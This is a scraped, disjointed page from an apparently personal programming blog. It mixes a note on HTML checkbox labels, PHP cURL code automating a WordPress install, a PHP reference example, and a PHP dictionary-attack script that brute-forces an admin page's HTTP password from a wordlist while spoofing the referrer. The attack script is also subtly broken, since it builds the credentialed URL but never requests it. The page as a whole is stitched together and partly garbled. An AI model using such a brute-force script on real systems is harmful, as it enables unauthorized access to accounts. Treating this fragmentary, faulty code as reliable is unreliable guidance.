Salam...
This blog is no longer maintain since I'm moving to my new site at http://ibnuyahya.com
Remember info?However, user can't click on that Remember info? text to check or uncheck that checkbox by using this method.
Instead of using normal text, we are using label and for tag. for tag inside label element attribute is refer to which checkbox.Then, when you click on remember info?.. the checkbox will checked/unchecked accordingly.
$url = 'http://mydomain.com/';
$postdata = "Submit=Install%20WordPress&admin_email=" . $wp_admin_email . "&blog_public=1&weblog_title=" . $wp_title;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url . "wp-admin/install.php?step=2");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt ($ch, CURLOPT_REFERER, $url . "wp-admin/install.php");
curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt ($ch, CURLOPT_POST, 1);
$result = curl_exec ($ch);
curl_close($ch);
$url = "http://www.example.com/admin/"; // Set the URL to be bruteforced
$ref = "http://www.example.com/index.php"; // Set the referrer to spoof
$denied = "Forbidden"; // Set the "Denied" output
$wordlist = "/var/www/wordlist.txt"; // Set the wordlist location
set_time_limit( 0 ); // Set script execution limit. 0 = no limit
$ch = curl_init( ); // Initialise cURL
curl_setopt( $ch, CURLOPT_URL, $url ); // Set URL as $url
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,1 ); // Set RETURNTRANSFER to TRUE
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION,1 ); // Set FOLLOWLOCATION to TRUE
foreach( file( $wordlist ) as $password ) // Start the loop for dictionary attack
{
$force = "http://admin:{$password}@www.example.com/admin/"; // Set the URL to attack,
curl_setopt( $ch, CURLOPT_URL, $url ); // Load the URL to attack with cURL
$check = curl_exec( $ch ); // Set params to check
if( !eregi( $denied, $check ) ) // Check to see if $denied is not in page
{
die( "Success! The password is: {$password}" ); // If $denied returns false, success
}
}
curl_close( $ch ); // Close the cURL process
/** Include user install customize script. */
if ( file_exists(WP_CONTENT_DIR . '/install.php') )
require (WP_CONTENT_DIR . '/install.php');
$foo = 'bar';
$baz = &$foo;
echo $foo //bar
echo $baz //bar
$foo = 'foobazbar';
echo $foo //foobazbar
echo $baz //foobazbar
am I a geek? All Rights Reserved. Blogger Template created by Deluxe Templates
Wordpress Theme by Skinpress | Supported by Dante Araujo